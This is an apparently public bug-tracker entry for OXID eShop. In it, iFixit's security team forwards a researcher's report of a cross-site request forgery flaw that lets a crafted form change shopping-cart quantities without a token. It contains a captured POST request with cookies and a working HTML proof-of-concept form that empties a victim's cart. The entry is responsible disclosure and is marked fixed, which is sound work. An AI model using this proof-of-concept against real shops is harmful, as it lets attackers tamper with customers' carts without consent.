View Issue Details
| ID | Project | Category | View Status | Date Submitted | Last Update |
|---|---|---|---|---|---|
| 0006674 | OXID eShop (all versions) | 4.04. Security | public | 2017-08-02 13:05 | 2017-08-18 15:39 |
| Reporter | marco_steinhaeuser | Assigned To | |||
| Priority | normal | Severity | minor | Reproducibility | always |
| Status | resolved | Resolution | fixed | ||
| Product Version | 4.10.5 / 5.3.5 | ||||
| Target Version | 4.10.6 / 5.3.6 | Fixed in Version | 4.9.10 / 5.2.10 | ||
| Summary | 0006674: OXID potential CSFR bug | ||||
| Description | Oxid Security Team, We received a report of a CSRF bug on our site `[domain.com]`. The jist is that a carefully crafted form can adjust cart item counts without a valid stoken or csrf protection mechanism. This is admittedly minor, but represents a valid security problem. This could admittedly be a known issue that could be solved by updates, but we would like to confirm that this problem is known about and has been addressed. -Daryl iFixit Security Team PS: Please find the original report included: ------------------------------------------------------------------ 1. CSRF on the EU Store: I just need "aid" which is always same for victim as well suppose if the somehow i came to know that the product name which is in cart then i easily get aid value by searching the product and intercepting my own request and used in my CSRF code. here is the POST request for the product that i want to search to find "aid" POST /index.php?lang=1& HTTP/1.1 Host: [domain.com] User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 316 Referer: https://[domain.com]/index.php?cl=details&cnid=699a66f8a4ded03b5795313fdf6281fa&anid=04832587843313ab35bf29aaab5f2ab3&listtype=search&searchparam=iphone&&lang=1 Cookie: _ga=GA1.2.532387267.1494626478; session=2b0d5cf9090fc367f6ce8753e4d4edf1; settingsc=current_page%3D%252FUser%252Feu_sso%3A%3Alast_page%3D%252FGuide%252FUser%252Fdozuki_sso; __utmx=120539472.yt3Er6fYT5-YKEiDeCa0zQ$0:0; __utmxx=120539472.yt3Er6fYT5-YKEiDeCa0zQ$0:1494630243:8035200; _gid=GA1.2.120962297.1497571472; _ceg.s=ormp2a; _ceg.u=ormp2a; language=1; sid=1f446ae471b83173539929786a3ed2a3; sid_key=oxid Connection: keep-alive Upgrade-Insecure-Requests: 1 stoken=3614313A&lang=1&cnid=699a66f8a4ded03b5795313fdf6281fa&listtype=search&actcontrol=details&searchparam=iphone&cl=details&aid=04832587843313ab35bf29aaab5f2ab3&anid=04832587843313ab35bf29aaab5f2ab3&parentid=0482063b7baac91cda48cf68bb0c660d&panid=&fnc=tobasket&varselid%5B0%5D=e90dfb84e30edf611e326eeb04d680de&am=1 in this i only need aid that is same for victim as well. i only need to change the aid in my csrf code. and no need of any token. and now am gonna send this file to victim. and his/her cart got empty here is the CSRF code for that <html> <!-- CSRF PoC --> <body> <form action="https://[domain.com]/index.php"> <input type="hidden" name="lang" value="1" /> <input type="hidden" name="cl" value="basket" /> <input type="hidden" name="fnc" value="changebasket" /> <input type="hidden" name="override" value="1" /> <input type="hidden" name="aid" value="04832587843313ab35bf29aaab5f2ab3" /> <input type="hidden" name="am" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html> | ||||
| Tags | No tags attached. | ||||
| Theme | Not defined | ||||
| Browser | Not defined | ||||
| PHP Version | Not defined | ||||
| Database Version | Not defined | ||||
